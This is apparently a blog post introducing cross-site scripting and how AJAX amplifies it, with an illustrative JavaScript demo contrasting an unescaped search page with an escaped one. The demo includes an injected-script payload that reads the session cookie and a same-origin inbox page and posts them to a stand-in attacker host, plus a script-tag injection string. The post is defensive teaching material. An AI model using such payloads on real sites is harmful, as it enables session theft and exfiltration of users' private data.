XSS: The Spark to the AJAX Dynamite
This entry serves as an introduction to the threat of cross-site scripting (XSS) and how it is exacerbated by the use of AJAX. It is the first part of a multipart series in which I will detail the numerous vulnerabilities that can lead to severe XSS-AJAX vulnerabilities.
You should follow this series closely if you manage or oversee a team that is currently, or will be, working on a web application with AJAX components. If you are considering moving your current client-server application to a web application, the following entries will be integral to understanding the threats associated with web applications that leverage AJAX technologies, and will let you make more secure decisions when designing the system.
At my last attendance of the Blackhat and Defcon security conferences I was surprised to see how far simple Cross Site Scripting vulnerabilities have come. The methods of finding and exploiting these vulnerabilities, as well as the possible payloads, have come so far in the last year that many testers, developers, project managers and CSOs don't know how powerful a security problem this can be.
The popularity of AJAX is unnecessarily increasing the attack surface of many web applications. Because the page talks to the server in the background, the user no longer sees what is being requested on their behalf, and every one of those background endpoints is exposed as an easily scriptable interface to the core functionality of the application. Any script an attacker manages to inject into the page can call that same interface.
By combining these technologies with misconfigured or vulnerable web applications, a malicious user can script much of the browsing experience and attack a user while they are on a trusted website: once injected script runs in the site's origin it runs with the victim's session, and the same-origin policy no longer stands in its way. These attacks include, but are not limited to, the following:
- Stealing cookies – one of the earliest attacks is to steal the user's cookies for the site, which may contain sensitive data or the session ID. With the session ID an attacker can present it to the site and act as the victim user without ever supplying credentials. Marking the session cookie HttpOnly keeps it out of document.cookie, but script running in the page can still use the session without reading the cookie, as the next item shows.
- Retrieving web contents – with AJAX (XMLHttpRequest) the injected script can request any page on the same domain "behind the scenes" of the page the victim is currently viewing; the browser attaches the victim's cookies to those requests and, because the script is same-origin, lets it read the responses. This is especially interesting on sites where a lot of sensitive content is only a click away, such as webmail or document-sharing sites.
- Defacement – since the attacker's script controls the page, it can rewrite the document or float any contents over the page it likes, while the address bar still shows the trusted site.
- Redirection – the attacker can forcibly send the victim's browser to any site or page.
- Real time spying – by posting what it observes to a remote site, the script can actively spy on the victim's browser: which pages they visit, what each page contains and everything they type into it, for as long as the injected code stays loaded.
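The spark-and-dynamite sequence the list above describes, as an added example that is not code from the original post: a page that reflects a query parameter without escaping (the XSS), the same page with proper escaping, and the kind of payload the injected script runs once it is inside the trusted origin. The search page, the /inbox path, the cookie value and the attacker host are all constructed for illustration, and the victim's browser is replaced by a small in-memory stand-in so the example runs offline; in a real browser the stand-in's get is a same-origin XMLHttpRequest and its send is any request the attacker can receive.

```javascript
// Added example (not code from the original post): how a reflected XSS
// "spark" turns into an AJAX-driven payload. The search page, the /inbox
// path, the cookie value and the attacker host are all constructed here.

// --- The spark: a page that reflects a query parameter into its HTML.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// escape: false reproduces the vulnerable version that echoes input verbatim.
function renderSearchPage(query, { escape = true } = {}) {
  const shown = escape ? escapeHtml(query) : query;
  return `<html><body><h1>Results for: ${shown}</h1></body></html>`;
}

// --- The dynamite: what the injected script does once it executes inside
// the trusted site's origin. In a real browser env.cookie is document.cookie,
// env.get is a (synchronous, for simplicity) XMLHttpRequest to the same
// origin, which the browser sends with the victim's cookies, and env.send is
// any cross-origin request the attacker can receive (image beacon, form post).
function payload(env) {
  const loot = { cookie: env.cookie, inbox: env.get("/inbox") };
  env.send("https://attacker.invalid/collect", loot);
  return loot;
}

// --- A constructed stand-in for the victim's browser session, so the example
// runs offline: same-origin pages, the session cookie and an exfiltration sink.
function makeVictimEnv({ httpOnly = false } = {}) {
  const pages = {
    "/inbox": "<ul><li>From: cfo@example.com - Q3 numbers (draft)</li></ul>",
  };
  const received = [];
  return {
    // HttpOnly cookies are not exposed through document.cookie, but the
    // browser still attaches them to the same-origin request made by get().
    cookie: httpOnly ? "" : "SESSIONID=c4f3b00c9e1d",
    get: (path) => (path in pages ? pages[path] : "404 Not Found"),
    send: (url, data) => { received.push({ url, data }); },
    received,
  };
}

// Constructed payload: the reflected parameter pulls the attacker's script.
const XSS_PAYLOAD = '<script src="https://attacker.invalid/p.js"></script>';

function demo() {
  console.log("vulnerable page:", renderSearchPage(XSS_PAYLOAD, { escape: false }));
  console.log("escaped page:   ", renderSearchPage(XSS_PAYLOAD));

  const victim = makeVictimEnv();
  console.log("attacker receives:", payload(victim));

  // HttpOnly hides the cookie value, but the inbox is still readable.
  const hardened = makeVictimEnv({ httpOnly: true });
  console.log("with HttpOnly cookie:", payload(hardened));
}

demo();
```

The second run in demo is the caveat worth remembering: an HttpOnly session cookie stops the payload from reading the session ID, but the same-origin request still goes out with the victim's session and the inbox contents still reach the attacker. Output escaping at the point where untrusted data enters the HTML is what removes the spark.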
If you have any specific worries or vulnerabilities you'd like me to address in the coming weeks, please post them in the comments and I'll respond in my future entries or the comments section. This is going to be an exciting number of weeks!